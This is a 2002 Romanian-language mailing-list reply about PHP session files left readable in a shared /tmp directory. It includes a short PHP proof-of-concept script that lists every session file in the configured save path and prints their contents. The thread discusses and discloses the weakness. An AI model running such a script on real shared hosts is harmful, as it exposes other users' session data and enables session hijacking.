Hi Ionut!
On Mon, 25 Mar 2002, Ionut Radu wrote:
>
> Salve,
>
> baieti nu este vorba numai de cei care au acces shel acolo, ganditi-va ca se
> poate face un programel care sa citeasca continutul din /tmp si partea
> nasoala e ca raman acolo, e drept nu am folosit session_destroy sa vad daca
> le sterge atunci.
>
Well, well, mi-a scapat ca nu poti scoate x pen' ca nu mai poate PHP-ul sa faca
gc.
Trebuie sa recunosc ca Ionut are dreptate!.
Nu am testat daca in safe mode are vreun efect, dar este absolut de dorit la
session.save_handler sa ai user (si mm e oarecum safe, dar sunt prea multi
`daca' pentru a spune asta).
iata si un script php `proof of concept':
<?php
if (ini_get('session.save_handler') != "files") {
echo "bad luck(no `files' handler), good admin";
exit;
}
$sess_dir = ini_get('session.save_path');
$dir_hndl = opendir ($sess_dir);
if (!$dir_hndl) {
echo "bad luck (`$sess_dir' not readable), good admin";
exit;
}
$sessions = array();
while ($file = readdir($dir_hndl)) {
if (preg_match("/sess_[a-zA-Z0-9]+/", $file))
$sessions[substr($file,5)] = implode("",file("$sess_dir/$file"));
}
closedir($dir_hndl);
print "<h3>Hello stranger, here are some sessions:</h3>";
print "<pre>";
print_r($sessions);
print "</pre>";
-- teodor
---
Send e-mail to '[EMAIL PROTECTED]' with 'unsubscribe rlug' to
unsubscribe from this list.
